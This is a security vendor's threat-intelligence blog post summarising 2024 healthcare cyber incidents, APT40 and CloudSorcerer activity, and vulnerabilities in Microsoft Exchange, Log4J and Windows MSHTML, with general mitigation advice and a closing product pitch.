top of page

Subscribe to our newsletter

2024 Healthcare Cybersecurity Threats: Critical Vulnerabilities in Microsoft Exchange, Log4J, and Windows MSHTML

  • Rescana
  • Oct 10, 2024
  • 3 min read
CVE Image for report on Healthcare Cybersecurity 2024

Executive Summary

In 2024, the healthcare sector has been significantly impacted by cybersecurity incidents, with 78% of healthcare organizations worldwide reporting at least one such incident. These breaches have not only disrupted healthcare delivery but have also posed severe risks to patient safety and the integrity of medical devices. This report provides an in-depth analysis of the vulnerabilities, exploits, and threat actors involved, offering actionable insights for Rescana's clients to enhance their cybersecurity posture.

Technical Information

The healthcare industry has become a prime target for cyberattacks due to its critical nature and the sensitive data it holds. The most common vulnerabilities exploited include weak password protocols, outdated software, and insufficient encryption. Notably, APT40, a China-based cyber group, has been actively exploiting vulnerabilities in Microsoft Exchange, Log4J, and Atlassian Confluence. These vulnerabilities have been leveraged to gain unauthorized access to healthcare networks, leading to data breaches and potential disruptions in medical services. The Windows MSHTML platform zero-day vulnerability has also been a focal point for attackers, used to deliver information-stealing malware. This vulnerability allows attackers to execute arbitrary code, compromising the confidentiality and integrity of sensitive healthcare data.

Healthcare organizations have reported significant impacts on care delivery, with 61% experiencing notable disruptions. In 15% of cases, these incidents have had severe consequences on patient health and safety. Critical medical devices, such as MRIs and infusion pumps, have been compromised in 30% of incidents, highlighting the urgent need for robust cybersecurity measures. Infrastructure vulnerabilities have also been a concern, with 27% of incidents targeting Building Management System (BMS) devices. Furthermore, 38% of organizations have only basic or no network segmentation, exposing them to increased risks.

The newly identified APT group, CloudSorcerer, has been abusing public cloud services for data theft, further complicating the threat landscape. This group has been particularly adept at exploiting the lack of security controls in cloud environments, leading to significant data breaches. The healthcare sector's reliance on cloud services necessitates a reevaluation of security strategies to mitigate these emerging threats.

Exploitation in the Wild

The exploitation of the Windows MSHTML platform zero-day vulnerability has been observed in the wild, with attackers using it to deploy information-stealing malware. Indicators of Compromise (IOCs) include unusual network traffic patterns, unauthorized access attempts, and the presence of malicious code in system files. The exploitation of Microsoft Exchange and Log4J vulnerabilities has also been prevalent, with attackers leveraging these weaknesses to gain persistent access to healthcare networks.

APT Groups using this vulnerability

APT40 and CloudSorcerer have been identified as key players exploiting these vulnerabilities. APT40, known for its sophisticated cyber espionage activities, has been targeting healthcare infrastructures to exfiltrate sensitive data. CloudSorcerer, on the other hand, has been focusing on abusing public cloud services, exploiting the lack of security controls to conduct data theft operations.

Affected Product Versions

The vulnerabilities in Microsoft Exchange, Log4J, and Atlassian Confluence affect multiple versions of these products. Organizations using outdated or unpatched versions are particularly at risk. The Windows MSHTML platform zero-day vulnerability affects systems running older versions of Windows, necessitating immediate patching and updates.

Workaround and Mitigation

To mitigate these threats, healthcare organizations should prioritize proactive vulnerability management. This includes regularly updating and patching software, implementing strong password protocols, and enhancing encryption measures. Network segmentation should be improved to limit lateral movement within networks. Additionally, employee training programs should be enhanced to raise awareness about cybersecurity best practices. Monitoring network traffic and device behavior can also help in early detection of potential threats.

References

Rescana is here for you

At Rescana, we are committed to helping our clients navigate the complex cybersecurity landscape. Our Continuous Threat and Exposure Management (CTEM) platform provides comprehensive solutions to identify and mitigate vulnerabilities, ensuring the security and integrity of your healthcare infrastructure. We are here to support you in safeguarding your organization against emerging threats. For any questions or further information, please contact us at ops@rescana.com.

bottom of page